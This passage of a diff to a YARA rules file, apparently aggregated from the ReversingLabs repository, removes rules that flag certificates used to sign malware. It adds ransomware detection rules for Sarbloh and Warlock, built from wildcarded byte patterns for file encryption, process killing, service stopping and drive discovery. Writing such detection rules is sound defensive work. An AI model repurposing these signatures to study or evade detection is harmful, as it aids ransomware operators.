-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L261-L277"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Sarbloh.yara#L1-L88"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "9ae4a236e1252afc1db6fae4e388a53ebde7e724cc07c213d4bfc176cf0a0096"
+		logic_hash = "7259aa9d1fe657db220ee50f1610e6439ff61673d92f46ebc3b8cadd990f002c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Sarbloh"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 75 ?? 72 ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ??
+            ?? ?? 50 6A ?? 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 75
+            ?? 81 FE ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 8B D8 89 5D ?? 85 DB 0F 84 ?? ?? ?? ?? C1 E6 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 7D ?? 8D 85 ?? ?? ?? ??
+            6A ?? 6A ?? 50 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8B C1 8B 55 ?? 0B C2 89 4D ?? 89 55 ?? 0F 84 ?? ?? ?? ?? 0F 57 C0 66
+            0F 13 45 ?? 85 D2 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ??
+            8B 45 ?? 89 45 ?? EB ?? 8B 75 ?? 8B 7D ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ??
+            50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 89 4D ?? 89 45 ??
+            85 C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85
+            ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 6A ?? 6A ?? 56 8B 75 ??
+            8D 45 ?? 56 50 6A ?? 6A ?? 6A ?? 57 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 0F
+            85 ?? ?? ?? ?? 8B 75 ?? EB ?? 33 F6 8B 45 ?? 8B 4D ?? 89 75 ?? 89 4D ?? 89 45 ?? 85
+            C0 0F 8C ?? ?? ?? ?? 7F ?? 85 C9 0F 82 ?? ?? ?? ?? 6A ?? 6A ?? 8D 45 ?? 50 8D 85 ??
+            ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 33 FF 85 C0 0F 88 ?? ?? ?? ?? 85 F6 0F 84
+        }
+		$encrypt_files_p2 = {
+            8B 75 ?? 8D 45 ?? 56 50 53 52 6A ?? 52 FF 75 ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 53 8D 45 ?? 50 6A ?? 6A ?? 6A ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 85 C0 0F 88 ?? ?? ?? ?? 8B 4D ??
+            81 C7 ?? ?? ?? ?? 3B 7D ?? 72 ?? 8B 75 ?? 03 75 ?? 8B 45 ?? 83 D0 ?? 89 75 ?? 89 45
+            ?? 3B 45 ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B B5 ?? ?? ?? ?? 8B 75 ?? 0F 82 ?? ?? ?? ?? 8D
+            45 ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? F7 D8 6A ?? 1B DB 8D 45
+            ?? 23 5D ?? 50 6A ?? 6A ?? 6A ?? 6A ?? FF 75 ?? 89 5D ?? 89 5D ?? FF 15 ?? ?? ?? ??
+            F7 D8 1B F6 23 75 ?? 56 6A ?? 89 75 ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8
+            85 FF 0F 84 ?? ?? ?? ?? 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75 ?? FF 15 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 8D 45 ?? 89 5D ?? 50 57 6A ?? 6A ?? 6A ?? FF 75
+            ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 56 57 8D 45 ?? 50 6A ?? 6A
+            ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 39 75 ?? 75 ??
+            8B 85 ?? ?? ?? ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 6A ?? 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 8D 45 ?? 89 9D ?? ?? ?? ?? 50 6A ?? 6A ?? 6A ?? FF 75 ?? 89 B5 ??
+            ?? ?? ?? FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 85 C0 78 ?? 33 C0 B9 ?? ?? ?? ?? 83
+            7D ?? ?? 0F 44 C1 89 45 ?? 89 7D ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 03 4D ?? 39 4D ?? 73
+            ?? 90 8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 57 6A ?? FF 15 ?? ?? ??
+            ?? 50 FF 15 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 8B 75 ?? EB
+        }
+		$find_files_p1 = {
+            55 8B EC 83 EC ?? 53 56 8B 75 ?? 57 8B F9 83 3E ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 8D
+            45 ?? 50 52 FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 89 45 ?? 8D
+            45 ?? 50 8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 57 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 0F 89 4D ?? 85 C0 78 ??
+            83 F9 ?? 74 ?? FF 75 ?? BB ?? ?? ?? ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 50
+            FF 15 ?? ?? ?? ?? 8B 55 ?? EB ?? FF 75 ?? C7 06 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 8B 17 33 DB 89 55 ?? C7 45
+            ?? ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 81 C1 ?? ?? ?? ?? 39 4D ?? 73
+        }
+		$find_files_p2 = {
+            8B 45 ?? C6 00 ?? 8B 45 ?? 40 89 45 ?? 39 4D ?? 72 ?? 53 6A ?? 6A ?? 6A ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 8B F8 33 DB
+            89 5D ?? 81 FF ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 85 FF 78 ?? 8B 4D ?? 8B 35 ??
+            ?? ?? ?? 2B CB 0F 84 ?? ?? ?? ?? 83 E9 ?? 0F 85 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 8B C1
+            C1 E8 ?? F7 D0 A8 ?? 74 ?? F7 C1 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FE ?? 74 ?? 83 FE
+            ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 33 C0
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Select'Assistance Pro" and pe.signatures [ i ] . serial == "04:9c:e8:c4:7f:1f:0e:65:0c:b0:86:f0:cf:a7:ca:53" and 1393804799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_29F42680E653Cf8Fafd0E935553F7E86 : INFO FILE
+rule REVERSINGLABS_Win64_Ransomware_Warlock : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Warlock ransomware."
 		author = "ReversingLabs"
-		id = "f616e92c-ed9f-581c-aa15-970bddfb073a"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "66e2d232-c3d2-52ec-86f7-ede8c7796f94"
+		date = "2025-09-22"
+		modified = "2025-09-22"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L279-L295"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Warlock.yara#L1-L162"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "6c726e4c2933a6472d256a18ea5265660ff035d05036ab9cae3409ab5a7c7598"
+		logic_hash = "c0cf1491dba387c5b50ab9adfb2af978aacab19b13fbef78757544ad3a7f2475"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Warlock"
+		tc_detection_factor = 5
 		importance = 25
 
-	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment co.,Ltd" and pe.signatures [ i ] . serial == "29:f4:26:80:e6:53:cf:8f:af:d0:e9:35:55:3f:7e:86" and 1390175999 <= pe.signatures [ i ] . not_after )
-}
-
-rule REVERSINGLABS_Cert_Blocklist_0C15 : INFO FILE
-{
-	meta:
-		description = "Certificate used for digitally signing malware."
-		author = "ReversingLabs"
-		id = "4a7a5404-1a20-53a7-9670-6f5215582c9d"
-		date = "2020-08-05"
-		modified = "2023-11-08"
-		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L297-L313"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1ee88813270dddeeedd90edbce9be2ce74303a6799ee64b0e9bfaea7377d3b2d"
-		score = 75
-		quality = 90
-		tags = "INFO, FILE"
-		status = "RELEASED"
-		sharing = "TLP:WHITE"
-		category = "INFO"
-		importance = 25
+	strings:
+		$encrypt_files_p1 = {
+            48 89 4C 24 ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ??
+            ?? ?? 33 C0 83 F8 ?? 0F 84 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 15 ?? ?? ?? ?? 48 8D 8C 24
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0
+            74 ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 83
+            7C 24 ?? ?? 7D ?? 48 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0 75 ?? 48 8B
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 EB ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
+            90 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 89 44 24
+            ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? EB ?? 48 8B 44 24 ?? 48 83 C0 ?? 48
+            89 44 24 ?? 48 8B 44 24 ?? 48 39 44 24 ?? 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 48 89 44
+            24 ?? C7 44 24 ?? ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B 4C 24
+            ?? E8 ?? ?? ?? ?? 4C 8B C8 45 33 C0 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ??
+            ?? ?? 90 48 8B 4C 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 90
+        }
+		$encrypt_files_p2 = {
+            48 8B 4C 24 ?? E8 ?? ?? ?? ?? 0F B6 C0 85 C0 0F 84 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8D 8C 24 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 4C 24
+            ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B D1 48 8B C8 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 48
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 4C 24 ?? E8 ?? ??
+            ?? ?? 41 B8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B D1 48 8B C8 FF 15 ?? ?? ?? ??
+            85 C0 0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 90 0F B6 05 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D
+            94 24 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48
+            8B 84 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 94 24 ?? ??
+            ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
+            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
+            C8 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? 48 8D 0D ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 44 8B C0 48 8D 15
+            ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48
+        }
+		$encrypt_files_p3 = {
+            8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E9
+            ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 90
+            0F B6 05 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 94 24 ?? ??
+            ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 48 8D
+            8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 41 B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? 48 8D 0D ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D 8C 24 ?? ?? ?? ?? 44 8B C0 48 8D 15 ?? ?? ?? ??
+            48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48 8D 8C 24 ??
+            ?? ?? ?? E8 ?? ?? ?? ?? 90 EB ?? 83 7C 24 ?? ?? 74 ?? 48 8B 4C 24 ?? E8 ?? ?? ?? ??
+            48 8B C8 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 90 E9 ?? ?? ?? ?? 48 8D 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 90 E9 ??
+            ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
+        }
+		$kill_processes = {
+            48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ?? 33 D2 B9
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? E9 ?? ?? ?? ??
+            C7 44 24 ?? ?? ?? ?? ?? 48 8D 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ??
+            83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89
+            44 24 ?? 48 63 44 24 ?? 48 83 F8 ?? 73 ?? 48 63 44 24 ?? 48 8D 0D ?? ?? ?? ?? 48 8D
+            54 24 ?? 48 8B 0C C1 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 44 8B 44 24 ?? 33 D2 B9 ?? ?? ??
+            ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 74 ?? BA ?? ?? ?? ?? 48 8B 4C
+            24 ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 EB ?? EB ?? 48 8D 54 24
+            ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15
+            ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ??
+            C3
+        }
+		$stop_services_p1 = {
+            40 56 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 84 24 ?? ?? ?? ??
+            48 C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 41
+            B8 ?? ?? ?? ?? 33 D2 33 C9 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ??
+            E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 48 63 44
+            24 ?? 48 83 F8 ?? 0F 83 ?? ?? ?? ?? 48 63 44 24 ?? 48 8D 0D ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 48 8B 14 C1 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ??
+            0F 84 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8D 84
+            24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 BC
+            24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 48 8D
+            84 24 ?? ?? ?? ?? 48 89 44 24 ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 45 33 C9 4C
+            8B 44 24 ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 48 89 44 24
+            ?? FF 15 ?? ?? ?? ?? 48 8B 4C 24 ?? 4C 8B C1 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 89
+            44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ??
+            48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 44 8B 8C 24 ?? ?? ?? ?? 4C 8B 44 24 ?? BA ??
+            ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ??
+            ?? ?? EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 39 44 24 ?? 0F 83 ??
+            ?? ?? ?? 8B 44 24 ?? 48 6B C0 ?? 48 8D 4C 24 ?? 48 8B 54 24 ?? 48 8B F9 48 8D 34 02
+        }
+		$stop_services_p2 = {
+            B9 ?? ?? ?? ?? F3 A4 41 B8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
+            ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? BA ??
+            ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BC 24 ?? ?? ?? ?? ?? 74 ??
+            8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 48 8D 84 24 ?? ?? ?? ?? 48 89 44 24 ?? 41
+            B9 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0
+            74 ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? FF 15 ?? ?? ?? ?? 2B 44 24 ?? 3B 44 24 ??
+            76 ?? EB ?? EB ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 E9 ?? ?? ?? ?? FF 15 ?? ?? ??
+            ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 4C 8D
+            84 24 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 BC
+            24 ?? ?? ?? ?? ?? 74 ?? 8B 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 90 48 8D 84 24 ?? ??
+            ?? ?? 48 89 44 24 ?? 41 B9 ?? ?? ?? ?? 4C 8D 84 24 ?? ?? ?? ?? 33 D2 48 8B 4C 24 ??
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? EB ?? EB ?? 83 BC 24 ?? ?? ?? ?? ?? 75 ?? EB ?? FF 15
+            ?? ?? ?? ?? 2B 44 24 ?? 3B 44 24 ?? 76 ?? EB ?? EB ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
+            ?? 90 E9 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48
+            33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F 5E C3
+        }
+		$find_drives = {
+            48 8D 84 24 ?? ?? ?? ?? 48 8B F8 33 C0 B9 ?? ?? ?? ?? F3 AA C7 44 24 ?? ?? ?? ?? ??
+            EB ?? 8B 44 24 ?? FF C0 89 44 24 ?? 83 7C 24 ?? ?? 7D ?? 48 63 44 24 ?? 48 8B 4C C4
+            ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 48 63 44 24 ?? 8B 4C 24 ?? 48 8B 44 C4 ?? 48 89
+            84 CC ?? ?? ?? ?? 8B 44 24 ?? FF C0 89 44 24 ?? EB ?? FF 15 ?? ?? ?? ?? 41 B8 ?? ??
+            ?? ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24 ?? ?? 75 ?? E9 ??
+            ?? ?? ?? BA ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? 48 89 44 24 ?? 48 83 7C 24
+            ?? ?? 75 ?? FF 15 ?? ?? ?? ?? 4C 8B 44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 90 E9
+            ?? ?? ?? ?? 83 7C 24 ?? ?? 0F 86 ?? ?? ?? ?? C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 4C 8D
+            8C 24 ?? ?? ?? ?? 44 8B 44 24 ?? 48 8D 94 24 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 48 8D 8C 24 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 7E ?? B8 ?? ?? ??
+            ?? 48 6B C0 ?? 48 89 44 24 ?? 48 81 7C 24 ?? ?? ?? ?? ?? 73 ?? EB ?? E8 ?? ?? ?? ??
+            90 33 C0 48 8B 4C 24 ?? 66 89 84 0C ?? ?? 00 00 EB ?? 8B 44 24 ?? FF C8 8B C0 48 8B
+            54 24 ?? 48 8B 8C C4 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 44 24 ?? FF C8 89
+            44 24 ?? EB ?? EB ?? 41 B8 ?? ?? ?? ?? 48 8B 54 24 ?? 48 8B 4C 24 ?? FF 15 ?? ?? ??
+            ?? 85 C0 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4C 8B
+            44 24 ?? 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 90 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ??
+            ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5F C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "William Richard John" and pe.signatures [ i ] . serial == "0c:15" and 1387324799 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $encrypt_files_p* ) ) and ( $kill_processes ) and ( all of ( $stop_services_p* ) ) and ( $find_drives )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_0C0F : INFO FILE
+rule REVERSINGLABS_Linux_Ransomware_Kraken : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
